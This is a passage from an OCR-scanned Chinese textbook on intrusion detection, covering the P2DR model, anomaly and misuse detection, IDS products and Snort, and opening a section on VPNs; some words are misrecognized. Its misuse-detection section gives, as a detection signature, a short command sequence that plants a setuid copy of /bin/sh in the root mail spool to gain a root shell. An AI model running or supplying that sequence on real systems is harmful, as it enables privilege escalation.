使 用 。Heady 给 出 另外 的 入 侵 定义 ， 入 侵 是 指 有 关 试 图 破坏 资源 的 完整 性 、 机 密 性 及 可 
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用 性 的 活动 集合 。Smaha 从 分 类 角度 指出 入 侵 包括 尝试 性 闻 入 、 伪 装 攻击 、 安 全 控制 系 
统 渗透 、 泄 露 、 拒 绝 服 务 、 恶 意 使 用 六 种 类 型 。 

从 入 侵 造 成 的 严重 程度 看 ， 入 侵 可 以 分 为 : 

© 拒绝 服务 的 攻击 ， 入 侵 者 并 没有 获得 系统 的 访问 权 ， 而 是 利用 一 些 拒绝 服务 的 
攻击 程序 ， 引 起 网 络 挂 起 或 重新 启动 ; 

@ 入 侵 者 只 获得 系统 访问 权限 ， 即 获得 了 普通 级 别 的 系统 账号 和 口令 并 登录 主机 ， 
不 做 破坏 性 的 工作 ; 

© 入 侵 者 进入 系统 后 ， 毁 坏 改变 数据 ; 

@ 入 侵 得 到 部 分 或 整个 系统 的 控制 权 : 修改 系统 账户 、 口 令 、 修 改 日 志 、 安 装 后 
门 、 木 马 等 。 

入 侵 的 来 源 可 分 为 外 部 入 侵 者 (未 授权 的 用 户 )》 和 内 部 入 侵 者 (逾越 了 合法 访问 权 
限 的 授权 用 户 )。 

入 侵 检 测 的 基本 模型 是 PDR 模型 ， 其 思想 是 防护 时 间 大 于 检测 时 间 和 响应 时 间 。 

针对 静态 的 系统 安全 模型 提出 了 “动态 安全 模型 (P2DR)”。P2DR 模型 包含 4 个 主 
要 部 分 : Policy (安全 策略 )、Protection〈 防 护 )、Detection (检测 ) 和 Response CHAME). 

P2DR 模型 (图 3-57) 是 在 整体 的 安全 策略 (Policy) 的 控制 和 指导 下 ， 在 综合 运用 
防护 工具 Protection， 如 防火 墙 、 操 作 系统 身份 认证 、 加 密 等 手段 ) 的 同时 ， 利 用 检测 
工具 (Detection， 如 漏洞 评估 、 入 侵 检测 等 系统 ) 了 解 和 评估 系统 的 安全 状态 ， 通 过 适 
当 的 响应 CResponse) 将 系统 调整 到 “最 安全 ”和 “风险 最 低 ” 的 状态 。 防 护 、 检 测 和 
响应 组 成 了 一 个 完整 的 、 动 态 的 安全 循环 。 


检测 
人 ( Detection ) Qe 
防护 响应 
( Protection ) ( Response ) 


安全 策略 ( Policy ) 


图 3-57 P2DR 模型 


在 该 动态 模型 中 检测 和 响应 是 重要 的 组 成 部 分 ， 它 们 不 再 被 动 的 保护 网 络 和 系统 的 
安全 , 而 具有 监测 和 检测 功能 ， 同 时 对 不 安全 的 因素 进行 响应 并 采取 适当 的 防御 措施 。 
其 中 入 侵 检测 技术 是 该 动态 防御 模型 中 最 核心 的 技术 之 一 ， 具 有 动态 防御 的 意义 ， 可 以 
实时 的 检测 网 络 上 和 系统 内 的 用 户 的 一 举 一 动 ， 当 发 现 可 疑 行为 或 者 入 侵 行 为 时 能 采取 
相应 措施 。 

入 侵 检测 技术 主要 分 成 两 大 类 型 : 异常 入 侵 检测 和 误 用 入 侵 检测 。 异 常 入 侵 检测 是 


ao: 项 


A 
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指 能 够 根据 异常 行为 和 使 用 计算 机 资源 情况 检测 出 来 的 入 侵 。 这 种 检测 方式 试图 用 定量 
方式 描述 可 接受 的 行为 特征 ， 以 区 分 非 正常 的 、 潜 在 的 入 侵 性 行为 。Anderson 做 了 如 何 
通过 识别 “异常 ”行为 来 检测 入 侵 的 早期 工作 。 他 提出 了 一 个 威胁 模型 ， 将 威胁 分 为 外 
部 阅 入 、 内 部 渗透 和 不 当 行为 3 种 类 型 , 并 使 用 这 种 分 类 方法 开发 了 一 个 安全 监视 系统 ， 
可 检测 用 户 的 异常 行 为 。 外 部 闻 入 是 指示 经 授权 计算 机 系统 用 户 的 入 侵 ; 内 部 突破 是 指 
已 授权 的 计算 机 系统 用 户 访问 未 经 授权 的 数据 ， 不 当 行为 是 指 用 户 虽 经 授权 ， 但 对 授权 
数据 和 资源 的 使 用 不 合法 或 滥用 授权 。 误 用 入 侵 检 测 是 指 利用 已 知 系统 和 应 用 软件 的 弱 
点 攻击 模式 来 检测 入 侵 。 例 如 ，Internet 蠕虫 攻击 使 用 了 fingerd 和 sendmail 错误 ， 故 可 
以 归结 到 误 用 入 侵 这 种 类 型 。 与 异常 入 侵 检 测 相反 ， 误 用 入 侵 检 测 能 直接 检测 不 利 的 或 
不 可 接受 的 行为 ， 而 异常 入 侵 检 测 是 检查 出 与 正常 行为 相 违背 的 行为 。 入 侵 检测 技术 模 
型 最 早 由 DorothyDenning 提出 ， 如 图 3-58 所 示 。 目 前 ， 检 测 技术 及 其 体系 均 是 在 此 基 
础 上 的 扩展 和 细 化 。 


(审计 记录 /网 络 包 /应 用 程序 记录 


(2) 事 件 产生 器 


(3) 增添 或 修改 


(7) 规 则 集 


(4) 活 动 记录 


(8) 动 态 产 生活 动 记录 (9) 时 钟 


图 3-58 通用 入 侵 模 型 


入 侵 检 测 系 统 (IntrusionDetectionSystem，IDS) 可 以 定义 为 “识别 非法 用 户 未 经 授 
权 使 用 计算 机 系统 , 或 合法 用 户 越权 操作 计算 机 系统 的 行为 ”通过 收集 计算 机 网 络 中 的 
若干 关键 点 或 计算 机 系统 资源 的 信息 并 对 其 进行 分 析 ， 从 中 发 现 网 络 或 系统 中 是 否 有 违 
反 安全 策略 的 行为 和 被 攻击 的 迹象 的 计算 机 系统 ， 包 含 计算 机 软件 和 硬件 的 组 合 。 

入 侵 检测 系统 的 主要 功能 可 以 概括 为 : 

。 监视 并 分 析 用 户 和 系统 的 活动 ， 查 找 非 法 用 户 和 合法 用 户 的 越权 操作 ; 

。 检测 系统 配置 的 正确 性 和 安全 漏洞 ， 并 提示 管理 员 修 补漏 洞 ; 

。 对 用 户 的 非 正常 活动 进行 统计 分 析 ， 发 现 入 侵 行 为 的 规律 ; 

。 检查 系统 程序 和 数据 的 一 致 性 与 正确 性 ， 如 计算 和 比较 文件 系统 的 校 验 和 ; 

。 能 够 实时 对 检测 到 的 入 侵 行为 作出 反应 ; 
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。 操作 系统 的 审计 跟踪 管理 。 

入 侵 检测 的 基本 假设 是 : 用 户 和 程序 的 行为 是 可 以 被 收集 的 ， 例 如 通过 系统 审计 机 
制 。 更 重要 的 是 正常 行为 和 异常 行为 有 着 显著 的 不 同 。 因 此 入 侵 检测 系统 包含 以 下 几 个 
必需 的 要 素 : 

。 目标 系统 里 需要 保护 的 资源 。 例 如 : 网 络 服 务 ， 用 户 账号 ， 系 统 核心 等 ; 

。 标记 和 这 些 资源 相关 的 “正常 ”的 和 “合法 ”的 行为 的 模型 ; 

。 比较 已 经 建立 的 模型 和 收集 到 的 行为 之 间 差 别 的 技术 。 那 些 和 “正常 ”行为 不 同 

的 行为 则 认为 是 “入 侵 ”。 

一 个 合格 的 入 侵 检 测 系统 能 大 大 地 简化 管理 员 的 工作 ， 使 得 管理 员 能 够 更 容易 的 监 
视 、 审 计 网 络 和 计算 机 系统 ， 扩 展 了 管理 员 的 安全 管理 能 力 ， 从 而 保证 网 络 和 计算 机 系 
统 安 全 的 运行 。 

入 侵 检测 系统 的 体系 结构 大 致 可 以 分 为 基于 主机 型 (Host-Based)、 基 于 网 络 型 
(Network-Based) 和 基于 主体 型 (Agent-Based) 三 种 。 

基于 主机 入 侵 检 测 系统 为 早期 的 入 侵 检 测 系统 结构 ， 其 检测 的 目标 主要 是 主机 系统 
和 系统 本 地 用 户 。 检 测 原理 是 根据 主机 的 审计 数据 和 系统 的 日 志 发 现 可 疑 事件 ， 检 测 系 
统 可 以 运行 在 被 检测 的 主机 或 单独 的 主机 上 。 这 种 类 型 系统 依赖 于 审计 数据 或 系统 日 志 
的 准确 性 和 完整 性 以 及 安全 事件 的 定义 。 若 入 侵 者 设法 逃避 审计 或 进行 合作 入 侵 ， 则 基 
于 主机 的 检测 系统 就 暴露 出 其 弱点 ， 特 别 是 在 现在 的 网 络 环境 下 。 单 独 地 依靠 主机 审计 
信息 进行 入 侵 检测 难以 适应 网 络 安 全 的 需求 。 这 主要 表现 在 : 

(1) 主机 的 审计 信息 弱点 ， 如 易 受 攻击 、 入 侵 者 可 通过 使 用 某 些 系统 特权 或 调用 比 
审计 本 身 更 低级 的 操作 来 逃避 审计 。 

(2) 不 能 通过 分 析 主 机 的 审计 记录 来 检测 网 络 攻击 (域名 欺骗 、 端 口 扫描 等 )。 

基于 网 络 的 入 侵 检 测 系 统 在 一 定 程度 上 可 以 克服 以 上 弱点 。 这 种 检测 系统 根据 网 络 
流量 、 协 议 分 析 、 简 单 网 络 管理 协议 信息 等 数据 检测 入 侵 ， 如 Netstat 检测 系统 就 是 基于 
网 络 型 的 。 

主机 和 网 络 型 的 入 侵 检测 系统 是 一 个 统一 集中 系统 。 但 是 ， 随 着 网 络 系统 结构 的 复 
杂 化 和 大 型 化 ,系统 的 弱点 或 漏洞 将 趋向 于 分 布 式 。 另 外， 入 侵 行为 不 再 是 单一 的 行为 ， 
而 是 表现 出 相互 协作 入 侵 的 特点 。 入 侵 检测 系统 要 求 可 适应 性 、 可 训练 性 、 高 效 性 、 容 
错 性 、 可 扩展 性 等 要 求 。 不 同 的 IDS 之 间 也 需要 共享 信息 、 协 同 检测 。 

基于 主体 的 入 侵 检测 系统 是 被 美国 普度 大 学 安全 研究 小 组 提出 的 。 其 主要 的 方法 是 
采用 相互 独立 运行 的 进程 组 〈 称 为 自治 主体 ) 分 别 负责 检测 ， 通 过 训练 这 些 主体 ， 并 观 
察 系统 行为 ， 然 后 将 这 些 主体 认为 是 异常 的 行为 标记 出 来 ， 并 将 检测 结果 传送 到 检测 中 
心 。 另 外 ，S.Staniford 等 人 提出 了 CIDF (CommonIntrusionDetectionFramework)。 目 前 ， 
CIDF 正在 开发 和 讨论 之 中 ， 有 可 能 成 为 入 侵 检测 系统 的 标准 。 
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3.4.2.2 ”入 侵 检测 原理 

入 侵 检测 系统 (IDS) 的 构成 具有 一 定 的 相似 性 ， 基 本 上 都 是 由 固定 的 部 件 组 成 。 
如 图 3-59 所 示 , 基于 入 侵 检 测 技 术 的 入 侵 检测 系统 一 般 由 信息 采集 部 件 、 入 侵 分 析 部 件 
与 入 侵 响 应 部 件 组 成 。 


信息 采集 部 件 


收集 用 户 操作 与 状态 


入 侵 分 析 部 件 


入 侵 响 应 部 件 


图 3-59 入侵 检 测 系统 构成 


信息 采集 部 件 是 用 于 采集 原始 信息 的 部 件 ， 通 常情 况 下 是 运行 于 网 络 操作 系统 中 的 
Proxy 模块 或 专 有 的 网 络 设 备 。 信 息 采 集 部 件 的 作用 就 是 将 各 类 复杂 、 凌 乱 的 信息 按 着 
一 定 的 格式 进行 格式 化 并 交付 于 入 侵 分 析 部 件 。 

入 侵 分 析 部 件 是 入 侵 检测 系统 的 核心 部 分 ， 在 接收 到 信息 采集 部 件 收集 的 格式 化 信 
息 后 ， 按 着 部 件 内 部 的 分 析 引 擎 进行 入 侵 分 析 ， 分 析 引 擎 的 类 型 不 同 ， 所 需 的 格式 化 信 
息 也 不 同 ， 当 信息 满足 了 引擎 的 入 侵 标 准时 就 触发 了 入 侵 响 应 机 制 。 

入 侵 响 应 部 件 是 入 侵 检测 系统 的 功能 性 部 件 ， 当 入 侵 分 析 部 件 发 现 入 侵 后 ， 向 入 侵 
响应 部 件 发 送 入 侵 消息 ， 由 入 侵 响应 部 件 根 据 具体 的 情况 做 出 响应 ， 响 应 部 件 同 信 息 采 
集 部 件 一 样 都 是 分 布 于 网 络 中 ， 甚 至 与 信息 采集 部 件 集成 在 一 起 。 

了 解 入 侵 检测 系统 的 构成 后 ， 下 面 分 别针 对 异常 检测 、 误 用 检测 两 种 入 侵 检测 技术 
来 说 明 入 侵 检 测 的 原理 。 

1. 异常 检测 

异常 检测 〈 也 称 基 于 行为 的 检测 ) 是 指 把 用 户 习 惯 行为 特征 存储 在 特征 库 中 ， 然 后 
将 用 户 当前 行为 特征 与 特征 数据 库 中 的 特征 进行 比较 ， 若 两 者 偏差 较 大 ， 则 认为 有 异常 
情况 发 生 。 蜡 常 入 侵 检测 系统 的 目的 是 检测 、 防 止 冒 名 者 CMasqueraders) 和 网 络 内 部 
入 侵 者 (Insider) 的 操作 。 冒 名 者 指 的 是 网 络 内 部 或 外 部 使 用 一 个 未 被 授权 的 账号 的 计 
算 机 操作 者 。 内 部 入 侵 者 指 的 是 使 用 合法 账号 但 却 越权 使 用 或 滥用 资源 的 人 。 

异常 检测 的 主要 前 提 条 件 是 将 构建 用 户 正常 行为 轮廓 。 这 样 ， 若 通过 行为 轮廓 检测 
所 有 的 异常 活动 ， 则 可 检测 所 有 的 入 侵 性 活动 。 但 是 ， 入 侵 性 活动 并 不 总 是 与 异常 活动 
相符 合 。 这 种 活动 存在 四 种 可 能 性 : 
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入 侵 性 而 非 异常 ; 
非 入 侵 性 且 异 常 ; 
非 入 侵 性 且 非 异常 ; 
。 入 侵 性 且 异 常 。 
异常 检测 的 第 一 步 就 是 要 为 系统 中 的 用 户 、 程 序 和 其 他 相关 的 资源 建立 正常 行为 的 
模型 。 
异常 检测 方法 依赖 于 正常 行为 模型 的 建立 ， 不 同 的 模型 其 检测 方法 也 不 同 。 它 通过 
观测 到 的 一 组 测量 值 偏 离 度 来 预测 用 户 行为 的 变化 ， 然 后 作出 决策 判断 的 检测 技术 。 异 
常 检测 的 方法 包括 统计 方法 、 预 测 模式 生成 、 专 家 系统 、 神 经 网 络 、 用 户 意图 识别 、 数 
据 挖 气 和 计算 机 免疫 学 方法 等 。 
异常 入 侵 检 测 的 优点 是 不 需要 入 侵 的 先 验 知识 ， 与 系统 相对 无 关 ， 通 用 性 较 强 ， 有 
可 能 检测 出 以 前 未 出 现 过 的 攻击 方法 ， 即 检测 未 知 入 侵 ， 不 像 基 于 知识 的 检测 那样 受 已 
知 脆弱 性 的 限制 。 基 于 统计 的 方法 也 使 得 系统 具有 比较 好 的 自 适 应 能 力 ， 可 以 很 方便 地 
更 新 用 户 和 系统 模型 ， 因 为 更 新 统计 模型 相对 容易 一 些 。 
但 因为 不 可 能 对 整个 系统 内 的 所 有 用 户 行为 进行 全 面 的 描述 ， 况 且 每 个 用 户 的 行为 
是 经 常 改变 的 ， 所 以 它 的 误 检 率 很 高 。 尤 其 在 用 户 数目 众多 ， 或 工作 目的 经 常 改变 的 环 
境 中 。 其 次 由 于 统计 简 表 要 不 断 更 新 ， 入 侵 者 如 果 知 道 某 系统 在 检测 器 的 监视 之 下 ， 他 
们 能 慢 慢 地 训练 检测 系统 ， 以 至 于 最 初 认为 是 异常 的 行为 ， 经 过 一 段 时 间 训 练 后 也 认为 
是 正常 的 了 。 
经 总 结 ， 异 常 入 侵 检测 有 以 下 几 个 主要 的 缺点 
。 在 不 同 工 作 环境 下 ， 系 统 正 常 行为 的 特征 选取 有 很 大 的 不 同 。 
。 阅 值 的 正确 确定 非常 困难 。 
。 用 户 行为 经 常 动态 的 改变 。 
。 有 些 入 侵 只 通过 单个 数据 包 或 事件 不 能 确定 入 侵 ， 只 能 通过 分 析 相 互 关联 的 多 个 
数据 包 或 事件 之 间 的 关系 才能 够 被 检测 到 。 因 为 从 单个 数据 包 或 事件 来 看 ， 可 能 
他 们 都 是 正常 的 。 
。 基于 统计 的 系统 一 般 来 说 训练 时 间 都 比较 长 。 有 些 入 侵 者 因此 可 以 逐步 的 更 新 用 
户 模型 来 使 得 系统 将 他 的 行为 认为 是 正常 的 行为 。 
2. 误 用 检测 
误 用 检测 一 般 是 由 计算 机 安全 专家 首先 对 攻击 情况 和 系统 漏洞 进行 分 析 和 分 类 ， 然 
后 手工 的 编写 相应 的 检测 规则 和 特征 模型 。 误 用 入 侵 检测 的 主要 假设 是 具有 能 够 被 精确 
地 按 某 种 方式 编码 的 攻击 ， 并 可 以 通过 捕获 攻击 及 重新 整理 ， 确 认 入 侵 活动 是 基于 同一 
弱点 进行 攻击 的 入 侵 方法 的 变种 。 误 用 入 侵 检测 指 的 是 通过 按 预先 定义 好 的 入 侵 模式 以 
及 观察 到 入 侵 发 生 的 情况 进行 模式 匹配 来 检测 。 入 侵 模式 说 明了 那些 导致 安全 突破 或 其 
他 误 用 的 事件 中 的 特征 、 条 件 、 排 列 和 关系 。 一 个 不 完整 的 模式 可 能 表明 存在 入 侵 的 企 
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图 ， 模 式 构造 有 多 种 方式 。 

误 用 检测 技术 的 核心 是 维护 一 个 入 侵 规则 库 。 对 于 已 知 的 攻击 ， 它 可 以 详细 、 准 确 
的 报告 出 攻击 类 型 ， 但 是 对 未 知 攻击 却 效 果 有 限 ， 而 且 入 侵 模式 库 必 须 不 断 更 新 。 

误 用 检测 的 优点 在 于 它 依 据 具体 特征 库 进 行 判断 ， 所 以 检测 准确 度 很 高 ， 并 且 因 为 
检测 结果 有 明确 的 参照 ， 也 为 系统 管理 员 做 出 相应 措施 提供 了 方便 。 误 用 检测 的 主要 缺 
陷 在 于 与 具体 系统 依赖 性 太 强 ， 不 但 系统 移植 性 不 好 ， 维 护 工作 量 大 ， 而 且 将 具体 入 侵 
手段 抽象 成 知识 也 很 困难 。 并 且 检 测 范 围 受 已 知 知识 的 局 限 ， 尤 其 是 难以 检测 出 内 部 人 
员 的 入 侵 行为 ， 如 合法 用 户 的 泄露 ， 因 为 这 些 入 侵 行为 并 没有 利用 系统 脆弱 性 。 

其 检测 原理 是 按 先 定 义 好 的 入 侵 模 式 匹 配 当 前 用 户 的 活动 ， 若 匹配 则 有 入 侵 。 下 面 
例子 是 用 户 获取 root 权限 的 一 个 例子 ， 如 果 有 匹配 行为 ， 则 判断 有 入 侵 。 

例 : 

1.%cp/bin/sh/usr/spool/mail/root 

2.%chmod4755/usr/spool/mail/root 

3.%touchx 

4.%mailroot<x 


5.%/usr/spool/mail/root 

6.root% 
3.4.2.3 ”入 侵 检测 系统 配置 和 应 用 

到 目前 为 止 ， 入 侵 检 测 技术 已 经 成 功 应 用 于 许多 入 侵 检测 产品 。 国 外 的 网 络 安全 公 
司 与 大 型 网 络 设备 厂商 都 推出 了 自己 的 入 侵 检测 产品 ， 同 时 国外 许多 网 络 工程 实验 室 、 
著名 大 学 也 都 推出 了 自己 设计 的 实验 室 产 品 。 但 是 由 于 网 络 安全 产品 的 特殊 性 质 ， 在 网 
络 安全 产品 领域 中 占据 主导 地 位 的 多 是 由 国内 的 新 兴安 全 产品 企业 推出 的 网 络 安全 产 
品 。 以 下 是 对 这 些 产 品 的 介绍 : 

1. 国外 商业 产品 
CyberCopIDS 是 NAI 公司 的 网 络 安 全 产品 ， 由 CyberScanner、CyberServer 和 
CyberNetWare 三 个 部 分 构成 。 
Realsecure 是 ISS 公司 的 入 侵 检测 方案 ， 提 供 了 分 布 式 安全 体系 结构 ， 多 个 检测 
引擎 可 以 监控 不 同 的 网 络 并 向 中 央 管 理 控制 台 报 告 。 
Session_wall 是 Abimet 公司 的 功能 广泛 的 安全 产品 ， 具 有 入 侵 检测 功能 ， 该 产品 
提供 定义 监测 、 过 滤 及 封锁 通信 量 的 规则 功能 ， 并 且 解 决 方案 简洁 、 灵 活 。 
NFR (NetWareFlightRecorder) 是 Anzen 公司 提供 的 网 络 监控 框架 ， 可 以 有 效 地 
执行 入 侵 检测 任务 ， 可 以 在 NER 的 基础 上 定制 专门 用 途 的 系统 。 
IERS 系统 (InternetEmergencyResponseService) 由 IBM 公司 提供 ， 由 NetRanger 
检测 器 和 Boulder 检测 中 心 构成 。 
CiscoSecureIDS 是 由 Cisco 公司 提供 的 一 种 分 布 式 网 络 入 侵 检测 系统 ， 由 Sensor 
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(感应 器 )、Director (控制 器 ) 和 PostOffice (传感器 ) 构成 一 个 鲁 棒 、 可 信 、 有 
效 的 入 侵 检测 系统 。 
。 国外 实验 室 产品 
e AID (AdaptiveIntrusionDetectionSystem) 是 由 布 兰 登 大 学 研制 的 针对 局 域 网 络 监 
控 的 IDS， 基 于 Client/Server 模式 ， 利 用 SecureRPC 运行 。 
e AAFID (AutonomousAgentsForIntrusionDetection) 是 由 PurdueUniversity 部 分 学 
生 设 计 的 IDS。 
IDES (入 侵 检测 专家 系统 ) 是 由 SRI 国际 组 织 发 展 起 来 的 入 侵 检测 专家 系统 ， 是 
一 种 采用 复杂 的 统计 方法 来 检测 不 正常 行为 的 系统 。 
© W&S (WisdomandSense) 是 LosAlamos 国家 实验 室 开发 的 异常 检测 系统 。 运 行 
于 Unix 平台 ， 分 析 来 自 于 主机 的 审计 记录 ， 是 一 种 尝试 识别 不 同 于 历史 标准 的 
系统 使 用 方式 的 异常 检测 系统 。 
© NSM (网 络 安全 监视 器 ) 是 由 加 利 福 尼 亚 大 学 研制 的 ， 分 析 关 于 广播 LAN 的 信 
息 流量 来 检测 侵入 行为 。 
.国内 商业 产品 
© RIDS-100 是 由 瑞星 公司 自主 开发 研制 的 入 侵 检测 系统 , 它 集 入 侵 检测 、 网 络 管理 
和 网 络 监视 功能 于 一 身 ， 能 实时 捕获 内 外 网 之 间 传 输 的 所 有 数据 ， 利 用 内 置 的 攻 
击 特征 库 ， 使 用 模式 匹配 和 智能 分 析 的 方法 ， 检 测 网 络 上 发 生 的 入 侵 行为 和 异常 
现象 ， 并 在 数据 库 中 记录 有 关 事 件 ， 作 为 管理 员 事 后 分 析 的 依据 。 
e 曙光 GodEye-HIDS 主机 入 侵 检测 系统 由 曙光 信息 产业 北京》 研制 ， 是 一 款 面 
向 行业 安全 应 用 领域 的 增强 型 主机 入 侵 检测 产品 ， 采 用 分 布 式 入 侵 检测 构架 ， 在 
管理 、 检 测 、 防 攻击 、 自 身 保护 及 主动 防护 等 方面 表现 卓越 。 
天 阅 黑 客 入 侵 检 测 与 预警 系统 是 启明 星 尾 信息 技术 有 限 公 司 自行 研制 开发 的 入 
侵 检测 系统 ， 能 够 实时 监控 网 络 传输 ， 自 动 检测 可 疑 行 为 ， 及 时 发 现 来 自 网 络 外 
部 或 内 部 的 攻击 ， 并 可 以 实时 响应 ， 切 断 攻击 方 的 连接 。 
天 眼 入 侵 检测 系统 NPIDS 是 由 北京 中 科 网 威信 息 技术 有 限 公 司 研制 的 入 侵 检测 
产品 。 系 统 采用 引擎 /控制 台 结 构 ， 引 擎 在 网 络 中 各 个 关键 点 部 署 ， 通 过 网 络 和 中 
央 控 制 台 交换 信息 ， 提 供 安 全 审计 、 监 视 、 攻 击 识别 和 反攻 击 等 多 项 功能 ， 对 内 
部 攻击 、 外 部 攻击 和 误 操 作 进 行 实时 监控 ， 是 其 他 安全 措施 的 必要 补充 。 
不 同 的 IDS 产品 在 不 同 的 应 用 领域 发 挥 其 特殊 的 防护 功能 ， 起 着 不 同 的 作用 ; 但 几 
乎 每 种 产品 都 具有 自己 的 局 限 性 ， 必 须 在 一 个 大 型 网 络 中 综合 运用 才能 确保 网 络 的 稳定 
与 安全 。 
3.4.2.4 Snort 
下 面 简单 介绍 一 款 适 运行 于 任何 现代 的 操作 系统 的 IDS 一 一 Snort。 
Snort 是 一 款 开 源 的 网 络 入 侵 检 测 系统 ， 它 能 够 执行 实时 流量 分 析 和 IP 协议 网 络 的 
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数据 包 记 录 。Snort 可 以 执行 协议 分 析 和 内 容 查 询 / 匹 配 使 你 能 够 探测 各 种 攻击 和 探查 ， 
比如 缓冲 区 溢出 ， 隐 项 端口 扫描 , 通用 网 关 接口 (CGI) 攻击 , 服务 器 信息 块 协议 (SMB) 
探测 ， 操 作 系统 指纹 攻击 等 待 。Snort 正 快速 成 为 入 侵 检测 的 有 力 工具 。 

Snort 的 配置 有 3 个 主要 模式 : IRER (Sniffer), WK (PacketLogger) 和 网 络 入 侵 
检测 (NetworkImtrusionDetection )。 嗅 探 模式 主要 是 读 取 网 络 上 的 数据 包 并 在 控制 台 上 用 
数据 流 不 断 地 显示 出 来 ; 包 记 录 模 式 把 数据 包 记 录 在 磁盘 上 ; 网 络 入 侵 监 测 模式 是 最 复 
杂 最 难 配置 的 ， 它 可 以 分 析 网 流量 与 用 户 定义 的 规则 设置 进行 匹配 然后 根据 结果 执行 相 
应 的 操作 。 

Snort 的 体系 结构 由 四 个 基本 部 分 组 成 : 

o 嗅 探 器 。 网 络 嗅 探 器 允许 应 用 程序 或 者 硬件 设备 捕获 网 络 数据 流 。 就 因特网 而 言 ， 

它 通常 由 卫 流量 组 成 ， 但 是 在 本 地 局 域 网 和 遗留 网 络 中 ， 它 可 能 是 其 他 的 协议 
栈 ， 例 如 IPX 和 AppleTalk 流量 。 

o 预 处 理 器 。 预 处 理 器 接收 原 数据 包 并 由 相关 的 插件 处 理 ， 如 RPC 插件 ，HTTP 插 
件 ， 端 口 扫描 插件 等 。 这 些 插件 是 针对 数据 包 中 特定 行为 的 。 一 旦 数据 包 具 有 特 
定 类 型 的 “行为 ” 它 将 被 发 送 到 检测 引擎 。 

。 检测 引擎 。 检 测 引擎 是 Snort 中 基于 签名 的 入 侵 检 测 系统 的 主体 。 检 测 引 擎 接收 
来 自 预 处 理 器 及 其 插件 的 数据 ， 这 些 数据 会 通过 一 系列 规则 的 检测 。 如 果 规 则 与 
数据 包 中 的 数据 匹配 ， 数 据 将 送 往 警戒 处 理 器 。 

。 输出 。Snort 数据 如 果 与 引擎 内 的 某 规则 相 匹配 则 触发 警报 。 警 报 将 通过 网 络 连 

Pe. UNIX 套 接 字 、Windows 弹出 窗口 SMB 服务 信息 块 ) 或 者 SNMP 陷阱 服 
务 、Email 等 方式 发 出 ， 并 记录 上 日志， 警报 还 会 存储 到 一 个 SQL 数据 库 ， 辟 如 
MySQL 和 Postgres 等 。 

由 于 篇 幅 原 因 ， 此 处 对 Snort 中 规则 匹配 以 及 具体 命令 的 使 用 都 不 再 做 进一步 介绍 ， 

详细 文档 参见 www.snort.org. 
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虚拟 专用 网 络 (VirtualPrivateNetwork，VPN) 是 一 种 新 型 的 网 络 安全 传输 技术 ， 为 
数据 传输 和 服务 供应 提供 安全 通道 , 本 节 介 绍 VPN 的 概念 、VPN 的 协议 及 VPN 的 应 用 。 
3.4.3.1 VPN 概述 

随 着 商务 活动 的 日 益 频繁 ， 各 企业 开始 允许 其 生意 伙伴 、 供 应 商 通过 访问 本 企业 的 
局 域 网 ， 简 化 信息 交流 的 途径 ， 增 加 信息 交换 速度 。 依 靠 网 络 来 维持 和 加 强 他 们 之 间 的 
联系 和 合作 。 但 是 各 企业 发 现 ， 这 样 的 信息 交流 不 仅 带 来 了 网 络 的 复杂 性 ， 而 且 还 带 来 
了 网 络 管理 和 安全 方面 的 问题 。 因 为 Intemet 是 一 个 全 球 性 和 开放 性 的 ， 基 于 Internet 的 
商务 活动 就 面临 信息 威胁 和 安全 隐患 。 

另外 ， 越 来 越 多 的 公司 、 企 业 开 始 在 各 地 建立 分 支 机 构 ， 开 展业 务 ， 移 动 办 公 人 员 
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也 随 之 剧 增 。 在 这 样 的 背景 下 ， 这 些 移动 办 公 人 员 以 及 在 家 办 公 或 下 班 后 继续 工作 的 人 
员 和 远程 办 公 室 、 公 司 各 分 支 机 构 之 间 都 可 能 需要 建立 连接 以 进行 信息 传送 。 传 统 的 企 
业 网 组 网 方案 中 ， 要 进行 远 地 LAN 到 LAN 互 连 ， 除 了 租用 DDN 专线 或 帧 中 继 之 外 ， 
并 无 更 好 的 解决 方法 。 对 于 移动 用 户 与 远 端 用 户 而 言 ， 只 能 通过 拨号 线路 进入 企业 各 自 
独立 的 局 域 网 。 随 着 全 球 化 的 步伐 加 快 ， 移 动 办 公 人 员 越 来 越 多 ， 公 司 客户 关系 越 来 越 
庞大 , 这 样 的 方案 必然 导致 高 昂 的 长 途 线路 租用 费 及 长 途 电 话费 。 于 是 , 虚拟 专用 网 VPN 
(VirtualPrivateNetwork) 的 概念 与 市 场 随 之 出 现 。 其 实 虚 拟 专用 网 VPN 技术 并 不 是 什么 
新 鲜 事物 ， 早 在 1993 年 ， 欧 洲 虚拟 专用 网 联盟 (EVUA) 就 成 立 了 ， 力 图 在 全 欧洲 范围 
内 推广 VPN, HF Intemet 的 迅猛 发 展 为 VPN 提供 了 技术 基础 ， 全 球 化 的 企业 为 VPN 
提供 了 市 场 ， 使 得 VPN 开始 遍布 全 世界 。 


公司 总 部 
计算 机 2 
出 差 用 户 


图 3-60 VPN 网 络 拓扑 结构 


VPN 即 虚拟 专用 网 ， 它 是 依靠 ISP (nternet 服务 提供 商 ) 和 其 他 NSP (网 络 服务 提 
供 商 )， 在 公用 网 络 中 建立 专用 的 、 安 全 的 数据 通信 通道 的 技术 。VPN 可 以 认为 是 加 密 
和 认证 技术 在 网 络 传输 中 的 应 用 。 所 谓 虚 拟 ， 是 指 用 户 不 再 需要 拥有 实际 的 长 途 数据 线 
路 ， 而 是 使 用 Intemet 公众 数据 网 络 线路 。 所 谓 专用 网 ， 是 指 用 户 可 以 为 自己 制定 一 个 
最 符合 自己 需求 的 网 络 。 

虚拟 专用 网 是 企业 网 在 因特网 等 公共 网 络 上 的 延伸 ， 通 过 一 个 私有 的 通道 在 公共 网 
络 上 创建 一 个 安全 的 私有 连接 。 虚 拟 专用 网 通过 安全 的 数据 通道 将 远程 用 户 、 公 司 分 支 
机 构 、 公 司 业务 伙伴 等 跟 公 司 的 企业 网 连接 起 来 ， 构 成 一 个 扩展 的 公司 企业 网 。 在 该 网 
中 的 主机 将 不 会 觉察 到 公共 网 络 的 存在 , 仿佛 所 有 的 主机 都 处 于 一 个 网 络 之 中 , 如 图 3-60 
所 示 。 
由 于 VPN 是 建立 在 Intemet 上 的 能 够 自我 管理 的 专用 网 络 ， 从 而 使 用 户 节省 了 租用 
专线 的 费用 。 在 运行 的 资金 支出 上 ， 除 了 购买 VPN 设备 外 ， 企 业 所 付出 的 仅仅 是 向 企 
业 所 在 地 的 ISP 支付 一 定 的 上 网 费用 , 也 节省 了 长 途 电话 费 . 所 以 VPN 的 价格 非常 低廉 。 
